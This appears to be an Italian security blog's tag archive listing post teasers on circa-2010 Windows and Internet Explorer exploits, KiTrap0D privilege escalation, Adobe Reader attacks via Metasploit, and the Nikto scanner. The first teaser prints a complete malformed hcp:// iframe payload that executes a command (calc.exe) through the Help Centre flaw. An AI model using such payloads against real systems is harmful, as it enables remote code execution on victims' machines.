Categorie:

Translate:
Italiano flagInglese flagFrancese flagTedesco flagPortoghese flagSpagnolo flag

Tag: ‘oday’

[EXPLOIT]Windows Help Centre Remote code Excution

Un altro exploit per windows, che permette l’esecuzione di comandi sul pc della vittima.
Bisogna passare a linux :D

Ma vediamo come funziona questo exploit, chiamato:
Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

Questo exploit, sfruttando i file asx possiamo aprire il windows help con un url malformato e far aprire ad esempio la
calcolatrice :D

I file asx, sono:

An ASX file (Advanced Stream Redirector) is a special type of file which works closely with Windows Media ASF files.

L’url malformato in questione è composto cosi:
<iframe src="hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%3C/script%3E">
(continua…)

IE 7/8 URL Validation Vulnerability:read local file and Excution CODE

Articolo in inglese però dai lo spiegherò in italiano, o almeno cercherò di farmi capire.

Questa vulnerabilità, è stata fixata con una patch rilasciata il 9 febbraio 2010 ;)
Io ho avuto modo di testarla su internet explorer 7 ma dovrebbe funzionare anche su ie 8 e 6(che viene ancora usato :( )


Internet explorer, non convalida correttamente l’input e permette ad un malintenzionato di creare un URL ad arte e fare eseguire comandi (con un po’ di stupidità) o leggere i file (senza stupidità) dell’utente da remoto.
(continua…)

[guida]Nikto 2.1.1 è tra noi: Trova vulnerabilità in server web

Nikto è uno dei tool (open source) di vulnerability assessment più usati per l’auditing di siti web e sopratutto server web.

Lavora in base ad un database che viene aggiornato più o meno mensilmente con gli ultimi exploit pubblicati.
In più, è molto semplice da usare.

Nikto a differenza di altri tool, non prova solo gli exploit disponibili nel suo database ma va anche a cercare tutti quei file e quelle mis-configurazioni note che possono causare breccie in un sito web o disclosure di informazioni importanti.

Si possono attivare più test contemporaneamente come nell’esempio precedente e anche attivare il filtro per l’evasione degli IDS.

Nikto, si limita a verificare la presenza di vulnerabilità note nell’host target.

E’ per questo particolarmente efficace per l’assessment di siti che utilizzano codice commerciale o pubblico, un pò meno utile per quei siti con codice custom per cui l’assessment viene lasciato all’esperienza della persona incaricata del test.

Questa nuova versione di nikto, include numerosi cambiamenti:
(continua…)

Exploit wshom.ocx (Run) ActiveX Remote Code Execution per IE 6-7-8

Questo exploit, che è uscito il 22 gennaio 2010 permette di eseguire codice sulla nostra macchina windows durante l’utilizzo di internet explorer.

null

Ad esempio, se noi utilizziamo internet explorer da un account amministratore, questo exploit potrà, ad esempio aggiungerci un altro account.
(continua…)

KiTrap0D Virtual-DOS oday per metasploit :)

Avevo già parlato di questo exploit qui:
[Virtual DOS]Exploit privilege escalation windows 2000/XP/VISTA/7/SERVER
Che non fa altro che darci i privilegi system kernel da un account limitato o amministratore.

In questi giorni, ho anche parlato di altri 2 exploit:


[guida]Oday-Exploit Adobe Reader: Hack di Windows con metasploit

e
[guida]Hack di WINDOWS con metasploit e IE 0day aka (Aurora) exploit
(continua…)

[guida]Oday-Exploit Adobe Reader: Hack di Windows con metasploit

Pubblico questo exploit e la relativa guida, dopo un bel mesetto dall’uscita per evitare che qualche pirla faccia danni a qualcuno :)

Gli exploit che vedremo elencati sotto, funzionano con acrobat reader < = alla versione 9.2.
Perciò, vi consiglio di aggiornare acrobat alla versione 9.3 minimo.

Vediamo questi exploit, e come utilizzarli con metasploit :)
(continua…)